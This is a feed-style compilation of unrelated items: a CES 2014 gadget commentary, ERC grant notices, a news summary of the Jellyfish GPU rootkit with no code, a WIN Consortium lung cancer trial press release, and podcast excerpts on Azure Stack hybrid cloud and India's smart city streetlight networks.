Or "4K" as it has become more commonly known (yes, there's also an 8K that doubles the size... take all those other statements and double 'em!). I think the resolution bumps along the road to "photorealism" (whatever that really means...) are inevitable, so it's good to see them. But, even more than the transition from "Standard Definition" to "High Definition" has been slight in some respects (Blu-Ray adoption hasn't exactly skyrocketed because of various factors), I predict that UHD will make even less of a noise. It's great, don't get me wrong, to increase the fidelity, but unfortunately it poses a problem in terms of marketing (will they call the Blu-Ray discs "UHD Blu-Ray" or will they have to come up with some other marketing term to help differentiate the difference?), but also because of the state of the Internet... with bandwidth caps, generally slower internet across America and some parts of the world, there just simply isn't the backbone to deliver the content, if and when it becomes more prolific. Maybe there will be great changes by the time UHD films, TV, etc. become more widely available, but I suspect with the recent Net Neutrality debacle going on in the USA, those changes will be a long time in coming. Physical media is becoming less and less relevant these days so I think this will really be the deciding factor upon the merits of a native UHD format.

Playstation Now

Formerly known as the OnLive-like service Gaikai, this is Sony announcing they'll be streaming their back catalogue of PS3-era games to the PS4 (and other devices, including tablets). While I think it requires conditions that are unlikely to be met in our less-than-ideal state of the Internet in 2014, it is still a bold step on the part of a major corporation, and Sony should be applauded for trying to address all the angles for the PS4. I think the PS4 is really going to be a winner in 2014 and in years to come. For now, I'm less enthusiastic about Playstation Now itself, but it will be interesting to see how the service evolves over the next few years.

Steam Machines

So Valve announced their 12 or so hardware partners in making their Steam boxes. They're not really talking about their own, and I think everyone was expecting them to be the fourth horse in the console race. Everyone's still scratching their heads at what their ultimate aim is with the hardware partnerships (and their Beta program), but my guess is they're just tired of being shackled to Microsoft Windows and are doing what they can to espouse the idea that Steam can exist on many platforms. Bravo to them for defying expectations, but I think their communications have sent out something of a mixed message. Steam is a pioneering "middleware" platform, and I'm glad to see them making inroads toward escaping the "Windows PC-only" moniker it currently enjoys. I know, it's on Mac as well (and Linux, obviously), but the game libraries on those platforms are emerging slowly, and it would be silly for them to just trade one closed platform for another... so a move like this makes sense in terms of the long view. I'm excited for Valve. They have made tremendous strides in developing their software platform, and as it stands, their name has become synonymous with gaming on a platform other than a console. Remember when they were just the "Half-Life" mod guys? Yeah, me neither.

Oculus Rift

To me, these guys were the champions of the show. Although I have yet to try one myself, the enthusiasm from people who have is palpable. And from a theoretical standpoint, I think this product is as close to market as anything that might want to progress the idea of a truly immersive experience. Because the technology aims are so well conceived (they're still executing on the paradigm), I think this will be a new era for the kind of wraparound, fully enclosed virtual experience we've all been dreaming of since we read Neuromancer. The latest Crystal Cove prototype ups the resolution and adds head tracking, and is reportedly a superior experience in most ways (owing to a method of displaying fresh data and fading out the display in nanoseconds when that data isn't truly live or fresh... which equates to a lessening of the nausea that some people have been experiencing when using the tech). I think it trivializes it to say this is the second coming of "VR," and I hesitate to even use that awful term in the same breath, but even without considering the application of something like this with today's graphics technology, it's extremely exciting to think about what the actual consumer product may be and what vistas it will open up for us in video games and entertainment.




So that's it, as far as a high-level perspective goes. It's really hard to distill a massive show like CES down to just a few statements, and most likely there will be obscure exhibitors at the show which have yet to be widely discovered, but I think it's worthwhile taking a bird's eye view of the whole thing (from the perspective of a potential user of these products). If you're looking for more, check out TheVerge's coverage.

          Results of the first round of the ERC Proof of Concept 2017 call        

On 18 May 2017, the ERC announced the names of the 51 laureates selected in the first round of the Proof of Concept 2017 call.


          Results of the ERC Proof of Concept 2016 call        

In total, 133 ERC laureates were selected for funding under the ERC Proof of Concept 2016 call, with the aim of putting the results obtained through their ERC projects to use.


          Why proof of concept projects are so worthwhile         
New post by Boagworld
          Pancultural-e - Fred Richardson        
This presentation will highlight the workshops and training sessions the Pancultural-e Project team have used to generate and store a pool of multimedia resources, and the workshops and training sessions aimed at re-using this material for a variety of ICT projects, described briefly below. Basically, we have transformed a text-based 'chalk and talk' Aboriginal Cultural Awareness Program into a rich multimedia content resource pool. We are now working to insert this content into our Learnscope deliverables: [1] a multilingual website platform used to conduct classroom-based Aboriginal Awareness Programs (with content also being 'spun off' for use on our corporate website); [2] multilingual mp3 proof of concept audio podcasts; [3] multilingual mp4 proof of concept 'vodcasts'; [4] monolingual proof of concept vodcasts synchronised with real-time GPS-capable handheld devices. For more information on this Project please go to http://ntlearnscope2007.wikispaces.com/IAD
          QualiTest US Wins Bid for Project with Leading Manhattan Healthcare Provider After Successfully Pitching Proof of Concept for ICD-10 Testing        

A leading academic healthcare provider in New York City recently signed with QualiTest to control their automated end-to-end ICD-10 testing support services across multiple locations and systems. Competing against half a dozen other testing companies, QualiTest was selected to perform the organization’s testing because of their innovative approach to ICD-10 testing.

(PRWeb October 03, 2013)

Read the full story at http://www.prweb.com/releases/2013/10/prweb11173873.htm


          Meduza (Jellyfish) - new multi-platform malware that uses the GPU        
A team of programmers has developed a rootkit that uses the graphics card instead of the processor in order to stay hidden. The rootkit, codenamed "Meduza" (Jellyfish), is a proof of concept implementation showing that it is possible to run malware directly on the GPU. According to the team, this poses a greater danger than standard malware because, as they state, "there are no tools that analyse GPU malware".

Such rootkits could access main memory through DMA (direct memory access), which is available to most devices. DMA, according to these claims, bypasses the CPU, so this kind of malware is harder to detect. Worst of all, the malware remains in GPU memory even after the computer is shut down.

While the original version of the code was released for Linux, the team behind "Meduza" very quickly released versions for Windows and Mac OS X as well. The team wanted to raise awareness of the possibility of these attacks and to point out that the security industry is not yet ready for this kind of attack.

The developers of this rootkit are, reportedly, trying to explain that the problem lies not in the operating systems or the GPU, but in today's security tools, which are not ready for this new kind of threat.

More information can be found in the original PC World articles: "New Linux rootkit leverages graphics cards for stealth" and "Stealthy Linux GPU malware can also hide in Windows PCs, maybe Macs".
          Demonstration of the Double Helix        
This is a proof of concept blog post. Please give it a try and let me know if it works for you! Double Helix from the Wolfram Demonstrations Project by Sándor Kabai
          The Xbox One Looks Like One Wonderful System--With Two Caveats        
A PlayStation fangirl admits it: Today's reveal of the Xbox One kind of blew the PlayStation 4 reveal out of the water. Even the name, Xbox One, rather than the casually monikered Xbox 720, is surprising and different. The PS4 reveal was centered on the games (and yes, the graphics capability of the PS4 seems superior). But the Xbox One focused on the integration of the Xbox with all of the media in your living room, making it "one" system. Obviously, a tech demo held at Microsoft's headquarters in Redmond is less proof and more proof of concept, but if the Xbox One is everything Microsoft claims, it looks like science fiction made reality.
          FDA Allows WIN Consortium to Proceed with Targeted Tri-Therapy Clinical Trial in First Line Treatment of Metastatic Non Small Cell Lung Cancer        

VILLEJUIF, France--(BUSINESS WIRE/AETOS Wire)-- WIN Consortium (WIN) received the US Food and Drug Administration (FDA)’s approval to start the clinical investigation of a novel therapeutic approach using a combination of three targeted therapies for the first line treatment of patients with advanced Non Small Cell Lung Cancer (NSCLC). The Survival Prolongation by Rationale Innovative Genomics (SPRING) trial will aim to enroll patients who are usually offered first line platinum-based chemotherapy. Patients with documented targetable driver alterations (EGFR mutations, ALK rearrangements, ROS1 and MET exon 14 skipping mutations) will be excluded. The population of NSCLC patients without actionable oncogenic driver mutations, envisioned for the enrollment in SPRING trial, represents the vast majority of patients with metastatic NSCLC (~80% in the Caucasian population).
With over 60% of NSCLC detected in an advanced or metastatic stage, and less than 5% of patients alive at 5 years, a paradigm changing strategy for treating the deadliest cancer is needed. WIN’s novel approach is based on the utilization of the tri-therapy combination of targeted drugs, following the historical success of this approach in AIDS and tuberculosis. Similarly, our concept relies on the association of three targeted drugs that used in combination are expected to be highly potent, whereas used alone in monotherapy they produce only modest clinical outcome.
‘’Nevertheless, it is important to acknowledge a significant difference between cancer and AIDS which lies in the higher biological complexity and heterogeneity of cancer compared to AIDS. In AIDS, one tri-therapy combination is effective for a majority of patients, whereas in cancer it is expected that many combinations will be needed to treat all patients effectively. WIN Consortium has developed new technologies for tailoring combinations for each individual patient.’’ said Dr. John Mendelsohn, Chairman of WIN. "WIN’s trial, entitled SPRING, is therefore a first proof of concept of this novel approach in the treatment of lung cancer, and will test as a first combination three drugs from WIN’s big pharma members, Merck’s Avelumab combined with Pfizer’s Palbociclib and Axitinib.’’ added Dr. Mendelsohn.
SPRING’s investigator initiated research will be led by Dr. Razelle Kurzrock (University of California San Diego, Moores Cancer Center) and co-led by Dr. Enriqueta Felip (Vall d'Hebron Institute of Oncology) and is planned to be launched in 5 countries and 8 WIN member sites: University of California San Diego Moores Cancer Center and Avera Cancer Institute (Dr. Benjamin Solomon), USA; Institut Curie (Dr. Nicolas Girard), Centre Léon Bérard (Dr. Pierre Saintigny) and Hôpital Paris Saint-Joseph (Dr. Eric Raymond), France; Vall d'Hebron Institute of Oncology, Spain; Centre Hospitalier de Luxembourg (Dr. Guy Berchem); and Chaim Sheba Medical Center (Dr. Jair Bar), Israel.
The SPRING trial will start with a Phase I portion to explore the safety of the combination and determine the optimal doses for the Phase II that will explore the efficacy of this tri-therapy regimen in first line treatment of metastatic NSCLC. The trial will also aim to validate a novel algorithm SIMS (Simplified Interventional Mapping System) developed by WIN and designed to match each patient’s tumor biology to a specific drug combination. For this purpose, both tumor and normal lung tissue biopsies will be obtained and explored in the SPRING trial. DNA and RNA analysis will be performed by Dr. Brandon Young at Avera WIN Precision Oncology Laboratory in San Marcos, California on biopsies using, respectively, Illumina NGS (next generation sequencing) and HTG Molecular’s expression (mRNA and microRNA) EdgeSeq technology used in conjunction with Illumina (NGS). Data integration for the SIMS algorithm will be performed by Ben-Gurion University of the Negev (Dr. Eitan Rubin), Israel.
‘’It is an unprecedented cooperation between our WIN members from academia, industry and research organizations.“ said Dr. Vladimir Lazar, WIN Chief Scientific and Operating Officer. ‘’Eight clinical sites will activate the study, drugs will be provided by Pfizer Inc., DNA and RNA analysis technologies by Illumina and HTG Molecular and pharmacovigilance by Covance. In particular, we are grateful to Foundation ARC on cancer research in France for financial support to initiate the SPRING trial. We are welcoming the support of any other organization or private donors, wishing to join this unique global effort dedicated to lung cancer patients.’’ added Dr. Lazar.
‘’It is very exciting to see this endeavor becoming more concrete and this unprecedented cooperation materializing. We are looking forward to the activation of our clinical sites. We will need more combinations to be launched rapidly and other pharma companies to join us in this effort.’’, said Dr. Razelle Kurzrock, trial global coordinator, and Head of WIN Clinical Trials Committee. ‘’WIN has the potential and expertise to test other combinations and has the technologies needed to match patients’ tumor biology profile with the appropriate combination”.
About WIN Consortium
WIN Consortium is a French based non-profit network of 41 world-class academic medical centers, industries (pharmaceutical and diagnostic companies), health payer, research organizations and foundation and patient advocates spanning 17 countries and 4 continents, aligned to deliver now the progress in cancer treatment that is awaited by so many patients and families around the world.

For further information, please visit www.winconsortium.org

The next BriefingsDirect Voice of the Customer hybrid cloud advancements discussion explores the application development and platform-as-a-service (PaaS) benefits from Microsoft Azure Stack.

We’ll now learn how ecosystems of solutions partners are teaming to provide specific vertical industries with applications and services that target private cloud deployments.

Listen to the podcast. Find it on iTunes. Get the mobile app. Read a full transcript or download a copy.

Here to help us explore the latest in successful cloud-based applications development and deployment is our panel, Martin van den Berg, Vice President and Cloud Evangelist at Sogeti USA, based in Cleveland, and Ken Won, Director of Cloud Solutions Marketing at Hewlett Packard Enterprise (HPE). The discussion is moderated by Dana Gardner, Principal Analyst at Interarbor Solutions.

Here are some excerpts:

Gardner: Martin, what are some of the trends that are driving the adoption of hybrid cloud applications specifically around the Azure Stack platform?

Van den Berg: What our clients are dealing with on a daily basis is an ever-expanding data center; they see ever-expanding private clouds in their data centers. They are trying to get into the hybrid cloud space to reap all the benefits from both an agility and a compute perspective.


They are trying to get out of the data center space, to see how the ever-growing demand can leverage the cloud. What we see is that Azure Stack will bridge the gap between the cloud that they have on-premises, and the public cloud that they want to leverage -- and basically integrate the two in a true hybrid cloud scenario.

Gardner: What sorts of applications are your clients calling for in these clouds? Are these cloud-native apps, greenfield apps? What are they hoping to do first and foremost when they have that hybrid cloud capability?

Van den Berg: We see a couple of different streams there. One is the native-cloud development. More and more of our clients are going into cloud-native development. We recently brought out a white paper wherein we see that 30 percent of applications being built today are cloud-native already. We expect that trend to grow to more than 60 percent over the next three years for new applications.


The issue that some of our clients have has to do with some of the data being consumed in these applications. Either due to compliance issues, or because their information security divisions are not too happy, they don’t want to put this data in the public cloud. Azure Stack bridges that gap as well.
 
Microsoft Azure Stack can bridge the gap between the on-premises data center and what they do in the cloud. They can leverage the whole Azure public cloud PaaS while still having their data on-premises in their own data center. That's a unique capability.

On the other hand, what we also see is that some of our clients are looking at Azure Stack as a bridge to gap the infrastructure-as-a-service (IaaS) space. Even in that space, where clients are not willing to expand their own data center footprint, they can use Azure Stack as a means to seamlessly go to the Azure public IaaS cloud.

Gardner: Ken, does this jibe with what you are seeing at HPE, that people are starting to creatively leverage hybrid models? For example, are they putting apps in one type of cloud and data in another, and then also using their data center and expanding capacity via public cloud means?


Won: We see a lot of it. The customers are interested in using both private clouds and public clouds. In fact, many of the customers we talk to use multiple private clouds and multiple public clouds. They want to figure out how they can use these together -- rather than as separate, siloed environments. The great thing about Azure Stack is the compatibility between what’s available through Microsoft Azure public cloud and what can be run in their own data centers.

The customer concerns are data privacy, data sovereignty, and security. In some cases, there are concerns about application performance. In all these cases, it's a great situation to be able to run part or all of the application on-premises, or on an Azure Stack environment, and have some sort of direct connectivity to a public cloud like Microsoft Azure.

Because you can get full API compatibility, the applications that are developed in the Azure public cloud can be deployed in a private cloud -- with no change to the application at all.

Gardner: Martin, are there specific vertical industries gearing up for this more than others? What are the low-lying fruit in terms of types of apps?

Hybrid healthcare files

Van den Berg: I would say that hybrid cloud is of interest across the board, but I can name a couple of examples of industries where we truly see a business case for Azure Stack.

One of them is a client of ours in the healthcare industry. They wanted to standardize on the Microsoft Azure platform. One of the things that they were trying to do is deal with very large files, such as magnetic resonance imaging (MRI) files. What they found is that in their environment such large files just do not work from a latency and bandwidth perspective in a cloud.

With Microsoft Azure Stack, they can keep these larger files on-premises, very close to where they do their job, and they can still leverage the entire platform and still do analytics from a cloud perspective, because that doesn’t require the bandwidth to interact with things right away. So this is a perfect example where Azure Stack bridges the gap between on-premises and cloud requirements while leveraging the entire platform.

Gardner: What are some of the challenges that these organizations are having as they move to this model? I assume that it's a little easier said than done. What's holding people back when it comes to taking full advantage of hybrid models such as Azure Stack?

Van den Berg: The level of cloud adoption is not really yet where it should be. A lot of our clients have cloud strategies that they are implementing, but they don't have a lot of expertise yet on using the power that the platform brings.

Some of the basic challenges that we need to solve with clients are that they are still dealing with just going to Microsoft Azure cloud and the public cloud services. Azure Stack simplifies that because they now have the cloud on-premises. With that, it’s going to be easier for them to spin-up workload environments and try this all in a secure environment within their own walls, their own data centers.

Won: We see a similar thing with our client base as customers look to adopt hybrid IT environments, a mix of private and public clouds. Some of the challenges they have include how to determine which workload should go where. Should a specific workload go in a private cloud, or should another workload go in a public cloud?

We also see some challenges around processes, organizational process and business process. How do you facilitate and manage an environment that has both private and public clouds? How do you put the business processes in place to ensure that they are being used in the proper way? With Azure Stack -- because of that full compatibility with Azure -- it simplifies the ability to move applications across different environments.

Gardner: Now that we know there are challenges, and that we are not seeing the expected adoption rate, how are organizations like Sogeti working in collaboration with HPE to give a boost to hybrid cloud adoption?

Strategic, secure, scalable cloud migration 

Van den Berg: As the Cloud Evangelist with Sogeti, for the past couple of years I have been telling my clients that they don’t need a data center. The truth is, they probably still need some form of on-premises infrastructure. But the future is in the clouds, from a scalability and agility perspective -- and with the hyperscale at which Microsoft is building out its Azure cloud capabilities, there are no enterprise clients that can keep up with that.

We try to help our clients define strategy, help them with governance -- how do they approach cloud and what workloads can they put where based on their internal regulations and compliance requirements, and then do migration projects.

We have a service offering called the Sogeti Cloud Assessment, where we go in and evaluate their application portfolio on their cloud readiness. At the end of this engagement, we start moving things right away. We have been really successful with many of our clients in starting to move workloads to the cloud.

Having Azure Stack will make that even easier. Now, when a cloud assessment turns up some issues with moving to the Microsoft Azure public cloud -- because of compliance or privacy issues, or just comfort (sometimes the information security departments just don't feel comfortable moving certain types of data to a public cloud setting) -- we can move those applications to the cloud and leverage its full power and scalability while keeping the data within the walls of our clients’ data centers. That’s how we are trying to accelerate cloud adoption, and we truly feel that Azure Stack bridges that gap.


Gardner: Ken, same question, how are you and Sogeti working together to help foster more hybrid cloud adoption?

Won: The cloud market has been maturing and growing. In the past, it’s been somewhat complicated to implement private clouds. Sometimes these private clouds have been incompatible with each other, and with the public clouds.

In the Azure Stack area, now we have almost an appliance-like experience where we have systems that we build in our factories that we pre-configure, pretest, and get them into the customers’ environment so that they can quickly get their private cloud up and running. We can help them with the implementation, set it up so that Sogeti can help with the cloud-native applications work.
 
With Sogeti and HPE working together, we make it much simpler for companies to adopt the hybrid cloud models and to quickly see the benefit of moving into a hybrid environment.

Van den Berg: In talking to many of our clients, when we see the adoption of private cloud in their organizations -- if they are really honest -- it doesn't go very far past just virtualization. They truly haven't leveraged what cloud could bring, not even in a private cloud setting.

So talking about hybrid cloud, it is very hard for them to leverage the power of hybrid clouds when their own private cloud is just virtualization. Azure Stack can help them to have a true private cloud within the walls of their own data centers and so then also leverage everything that Microsoft Azure public cloud has to offer.

Won: I agree. When they talk about a private cloud, they are really talking about virtual  machines, or virtualization. But because the Microsoft Azure Stack solution provides built-in services that are fully compatible with what's available through Microsoft Azure public cloud, it truly provides the full cloud experience. These are the types of services that are beyond just virtualization running within the customers’ data center.

Keep IT simple

I think Azure Stack adoption will be a huge boost to organizations looking to implement private clouds in their data centers.

Gardner: Of course, your typical end-user worker is interested primarily in their apps; they don’t really care where they are running. But when it comes to new application development, rapid application development (RAD), these are some of the pressing issues that most businesses tell us concern them.

So how does RAD, along with some DevOps benefits, play into this, Martin? How are the development people going to help usher in cloud and hybrid cloud models because it helps them satisfy the needs of the end-users in terms of rapid application updates and development?

Van den Berg: This is also where we are talking about the difference between virtualization, private cloud, hybrid clouds, and true cloud services. For the application development staff, they still run in the traditional model; they still run into issues provisioning their development environments, and sometimes their test environments.

A lot of cloud-native application development projects are much easier because you can spin-up environments on the go. What Azure Stack is going to help with is having that environment within the client’s data center; it’s going to help the developers to spin up their own resources.

There is going to be on-demand orchestration and provisioning, which is truly beneficial to application development -- and it's really beneficial to the whole DevOps suite.

We need to integrate business development and IT operations to deliver value to our clients. If we are waiting multiple weeks for development and test environments to spin up -- that’s an issue our clients are still dealing with today. That’s where Azure Stack is going to bridge the gap, too.

Won: There are a couple of things that we see happening that will make developers much more productive and able to bring new applications or updates quicker than ever before. One is the ability to get access to these services very, very quickly. Instead of going to the IT department and asking them to spin up services, they will be able to access these services on their own.

The other big thing that Azure Stack offers is compatibility between private and public cloud environments. For the first time, the developer doesn't have to worry about what the underlying environment is going to be. They don’t have to worry about deciding, is this application going to run in a private cloud or a public cloud, and based on where it’s going, do they have to use a certain set of tools for that particular environment.

Now that we have compatibility between the private cloud and the public cloud, the developer can just focus on writing code, focus on the functionality of the application they are developing, knowing that that application now can easily be deployed into a private cloud or a public cloud depending on the business situation, the security requirements, and compliance requirements.

So it’s really about helping the developers become more effective and helping them focus more on code development and applications rather than having them worry about the infrastructure, or waiting for infrastructure to come from the IT department.


Gardner: Martin, for those organizations interested in this and want to get on a fast track, how does an organization like Sogeti working in collaboration with HPE help them accelerate adoption?

Van den Berg: This is where we partner heavily with HPE to bring the best solutions to our clients. We have all kinds of proofs of concept, we have accelerators, and one of the things we talked about already is making developers get up to speed faster. We can truly leverage those accelerators and help our clients adopt cloud, and adopt all the services that are available on the hybrid platform.

We have all heard the stories about standardizing on micro-services, on a server fabric, or serverless computing, but developers have not had access to this up until now and IT departments have been slow to push this to the developers.

The accelerators that we have, the approaches that we have, and the proofs of concept that we can do with our client -- together with HPE --  are going to accelerate cloud adoption with our clientele. 

Gardner: Any specific examples, some specific vertical industry use-cases where this really demonstrates the power of the true hybrid model?

When the ship comes in

Won: I can share a couple of examples of the types of companies that we are working with in the hybrid area, and what places that we see typical customers using Azure Stack.

People want to implement disconnected applications or edge applications. These are situations where you may have a data center or an environment running an application that you may either want to run in a disconnected fashion or run to do some local processing, and then move that data to the central data center.

One example of this is the cruise ship industry. All large cruise ships have essentially data centers running the ship, supporting the thousands of customers that are on the ship. What the cruise line vendors want to do is put an application on their many ships and to run the same application in all of their ships. They want to be able to disconnect from connectivity of the central data center while the ship is out at sea and to do a lot of processing and analytics in the data center, in the ship. Then when the ship comes in and connects to port and to the central data center, it only sends the results of the analysis back to the central data center.

This is a great example of having an application that can be developed once and deployed in many different environments, you can do that with Azure Stack. It’s ideal, running that same application in multiple different environments, in either disconnected or connected situations.

Van den Berg: In the financial services industry, we know they are heavily regulated. We need to make sure that they are always in compliance.

So one of the things that we did in the financial services industry with one of our accelerators, we actually have a tool called Sogeti OneShare. It’s a portal solution on top of Microsoft Azure that can help you with orchestration, which can help you with the whole DevOps concept. We were able to have the edge node be Azure Stack -- building applications, have some of the data reside within the data center on the Azure Stack appliance, but still leverage the power of the clouds and all the analytics performance that was available there.

We just did a project in this space and we were able to deliver functionality to the business, from the start of the project, in just eight weeks. They had never seen that before -- a project that lasts just eight weeks and truly delivers business value. That's the direction we should be taking. That’s what DevOps is supposed to deliver -- faster value to the business, leveraging the power of clouds.

Gardner: Perhaps we could now help organizations understand how to prepare from a people, process, and technology perspective to be able to best leverage hybrid cloud models like Microsoft Azure Stack.

Martin, what do you suggest organizations do now in order to be in the best position to make this successful when they adopt?

Be prepared

Van den Berg: Make sure that the cloud strategy and governance are in place. That's one of the first things this should always start with.

Then, start training developers, and make sure that the IT department is the broker of cloud services. In the traditional sense, it is always normal that the IT department is the broker for everything that is happening on-premises within the data center. In the cloud space, this doesn’t always happen. In the cloud space, because it is so easy to spin-up things, sometimes the line of business is deploying.

We try to enable IT departments and operators within our clients to be the broker of cloud services and to help with the adoption of Microsoft Azure cloud and Azure Stack. That will help bridge the gap between the clouds and the on-premises data centers.

Gardner: Ken, how should organizations get ready to be in the best position to take advantage of this successfully?

Mapping the way

Won: As IT organizations look at this transformation to hybrid IT, one of the most important things is to have a strong connection to the line of business and to the business goals, and to be able to map those goals to strategic IT priorities.

Once you have done this mapping, the IT department can look at these goals and determine which projects should be implemented and how they should be implemented. In some cases, they should be implemented in private clouds, in some cases public clouds, and in some cases across both private and public cloud.

The task then changes to understanding the workloads, the characterization of the workloads, and looking at things such as performance, security, compliance, risk, and determining the best place for that workload.

Then, it’s finding the right platform to enable developers to be as successful and as impactful as possible, because we know ultimately the big game changer here is enabling the developers to be much more productive, to bring applications out much faster than we have ever seen in the past.

Listen to the podcast. Find it on iTunes. Get the mobile app. Read a full transcript or download a copy. Sponsor: Hewlett Packard Enterprise.


You may also be interested in:

          India Smart Cities Mission shows IoT potential for improving quality of life at vast scale        
The next BriefingsDirect Voice of the Customer Internet-of-Things (IoT) transformation discussion examines the potential impact and improvement of low-power edge computing benefits on rapidly modernizing cities.

These so-called smart city initiatives are exploiting open, wide area networking (WAN) technologies to make urban life richer in services, safer, and far more responsive to residents’ needs. We will now learn how such pervasively connected and data-driven IoT architectures are helping cities in India vastly improve the quality of life there.

Listen to the podcast. Find it on iTunes. Get the mobile app. Read a full transcript or download a copy.

Here to share how communication service providers have become agents of digital urban transformation are VS Shridhar, Senior Vice President and Head of the Internet-of-Things Business Unit at Tata Communications, in the Chennai area of India, and Nigel Upton, General Manager of the Universal IoT Platform and Global Connectivity Platform and Communications Solutions Business at Hewlett Packard Enterprise (HPE). The discussion is moderated by Dana Gardner, Principal Analyst at Interarbor Solutions.

Here are some excerpts:

Gardner: Tell us about India’s Smart Cities mission. What are you up to and how are these new technologies coming to bear on improving urban quality of life?

Shridhar: The government is clearly focusing on Smart Cities as part of their urbanization plan, as they believe Smart Cities will not only improve the quality of living, but also generate employment, and take the whole country forward in terms of technologically embracing and improving the quality of life.

So with that in mind, the Government of India has launched 100 Smart Cities initiatives. It’s quite interesting because each of the cities that aspire to belong had to make a plan and their own strategy around how they are going to evolve and how they are going to execute it, present it, and get selected. There was a proper selection process.

Many of the cities made it, and of course some of them didn’t make it. Interestingly, some of the cities that didn’t make it are developing their own plans.
There is a lot of excitement and curiosity, as well as action, in the Smart Cities project. Admittedly, it's a slow process, it's not something that you can do in the blink of an eye, and Rome wasn't built overnight, but I definitely see a lot of progress.

Gardner: Nigel, it seems that the timing for this is auspicious, given that there are some foundational technologies that are now available at very low cost compared to the past, and that have much more of a pervasive opportunity to gather information and make a two-way street, if you will, between the edge and central administration. How is the technology evolution synching up with these Smart Cities initiatives in India?

Upton: I am not sure whether it’s timing or luck, or whatever it happens to be, but adoption of the digitization of city infrastructure and services is to some extent driven by economics. While I like to tease my colleagues in India about their sensitivity to price, the truth of the matter is that the economics of digitization -- and therefore IoT in smart cities -- needs to be at the right price, depending on where it is in the world, and India has some very specific price points to hit. That will drive the rate of adoption.

And so, we're very encouraged that innovation is continuing to drive price points down to the point that mass adoption can then be taken up, and the benefits realized to a much more broad spectrum of the population. Working with Tata Communications has really helped HPE understand this and continue to evolve as technology and be part of the partner ecosystem because it does take a village to raise an IoT smart city. You need a lot of partners to make this happen, and that combination of partnership, willingness to work together and driving the economic price points to the point of adoption has been absolutely critical in getting us to where we are today.

Balanced Bandwidth

Gardner: Shridhar, we have some very important optimization opportunities around things like street lighting, waste removal, public safety, water quality and, of course, the pervasive need for traffic and parking monitoring and improvement.

How do things like low-power specifications, Internet and network gateways, and low-power WANs (LPWANs) create a new technical foundation to improve these services? How do we connect the services and the technology for an improved outcome?

Shridhar: If you look at human interaction with the Internet, we have a lot of technology coming our way. We used to have 2G, which has moved to 3G and to 4G, and that is a lot of bandwidth coming our way. We would like to have a tremendous amount of access and bandwidth speeds and so on, right?

So the human interaction and experience is improving vastly, given the networks that are growing. On the machine-to-machine (M2M) side, it’s going to be different. They don’t need oodles of bandwidth. About 80 to 90 percent of all machine interactions are going to be very, very low bandwidth – and, of course, low power. I will come to the low power in a moment, but it’s going to be very low bandwidth requirement.

In order to switch off a streetlight, how much bandwidth do you actually require? Or, in order to sense temperature or air quality or water and water quality, how much bandwidth do you actually require?

When you ask these questions, you get an answer that the machines don’t require that much bandwidth. More importantly, when there are millions -- or possibly billions -- of devices to be deployed in the years to come, how are you going to service a piece of equipment that is telling a streetlight to switch on and switch off if the battery runs out?

Machines are different from humans in terms of interactions. When we deploy machines that require low bandwidth and low power consumption, a battery can enable such a machine to communicate for years.

Aside from heavy video streaming applications or constant security monitoring, where low-bandwidth, low-power technology doesn’t work, the majority of the cases are all about low bandwidth and low power. And these machines can communicate with the quality of service that is required.

When it communicates, the network has to be available. You then need to establish a network that is highly available, which consumes very little power and provides the right amount of bandwidth. So studies show that less than 50 kbps connectivity should suffice for the majority of these requirements.

Now the machine interaction also means that you collect all of them into a platform and basically act on them. It's not about just sensing it, it's measuring it, analyzing it, and acting on it.

Low-power to the people

So the whole stack does not consist of connectivity alone. LPWAN technology is emerging now and is becoming a de facto standard as more and more countries start embracing it.

At Tata Communications we have embraced the LPWAN technology from the LoRa Alliance, a consortium of more than 400 partners who have gotten together and are driving standards. We are creating this network over the next 18 to 24 months across India. We have made these networks available right now in four cities. By the end of the year, it will be many more cities -- almost 60 cities across India by March 2018.

Gardner: Nigel, how do you see the opportunity, the market, for a standard architecture around this sort of low-power, low-bandwidth network? This is a proof of concept in India, but what's the potential here for taking this even further? Is this something that has global potential?
Upton: The global potential is undoubtedly there, and there is an additional element that we didn't talk about, which is that not all devices require the same amount of bandwidth. We have talked about video surveillance requiring higher bandwidth, and we have talked about low-power, low-bandwidth devices that will essentially be deployed once and forgotten, expected to last 5 or 10 years.

We also need to add in the aspect of security, and that really gave HPE and Tata the common ground of understanding that the world is made up of a variety of network requirements, some of which will be met by LPWAN, some of which will require more bandwidth, maybe as high as 5G.

The real advantage of being able to use a common architecture to be able to take the data from these devices is the idea of having things like a common management, common security, and a common data model so that you really have the power of being able to take information, take data from all of these different types of devices and pull it into a common platform that is based on a standard.

In our case, we selected the oneM2M standard, it’s the best standard available to be able to build that common data model and that's the reason why we deployed the oneM2M model within the universal IoT platform to get that consistency no matter what type of device over no matter what type of network.

Gardner: It certainly sounds like this is an unprecedented opportunity to gather insight and analysis into areas that you just really couldn't have measured before. So going back to the economics of this, Shridhar, have you had any opportunity through these pilot projects in such cities as Jamshedpur to demonstrate a return on investment, perhaps on street lighting, perhaps on quality of utilization and efficiency? Is there a strong financial incentive to do this once the initial hurdle of upfront costs is met?

Data-driven cost reduction lights up India

Shridhar: Unless the customer sees that there is scope for either reducing cost or improving the customer experience, they are not going to buy these kinds of solutions. So if you look at how things have been progressing, I will give you a few examples of how the costs have started coming down and playing out. One, of course, is having devices that meet a certain price point. Nigel was remarking earlier how price-sensitive the Indian market is, but that's important: once we can deliver at a certain cost in India, we believe we can then deliver globally at scale. So if we build something in India, it will serve the global market as well.

Take the streetlight example specifically and see what kind of benefits it would give. When a streetlight operates for about 12 hours a day, it costs about Rs. 12, which is about $0.15. But when you start optimizing it -- say this is a streetlight that currently runs on halogen and you move it to LED -- it brings some cost savings, in some cases significant ones. India is going through an LED revolution, as you may have read in the newspapers; streetlights are being converted, and that's one distinct cost advantage.

Now they are looking at driving the usage and the electricity bills even lower by optimizing further. Let's say you sync the light with the astronomical clock, so that it comes on at 6:30 in the evening and shuts down at 6:30 in the morning, because now you are connecting this controller to the Internet.

The second thing you would do is keep it at its brightest during busy hours, let's say between 7:00 and 10:00, and after that start dimming it. You can step it down in 10 percent increments.

The point I am making is that you deliver the intensity of light the situation requires. If the street is busy, if there is nobody on it, or if there is a safety requirement, a sensor can trigger a series of lights, and so on.

So your ability to tune the streetlight to the actual requirement brings down the total cost. The $0.15 per streetlight that I mentioned could be brought down to $0.05. That's the kind of advantage you get by better controlling the streetlights. The business case builds up, and a customer can save 60 to 70 percent just by doing this. Obviously, then the business case stands out.
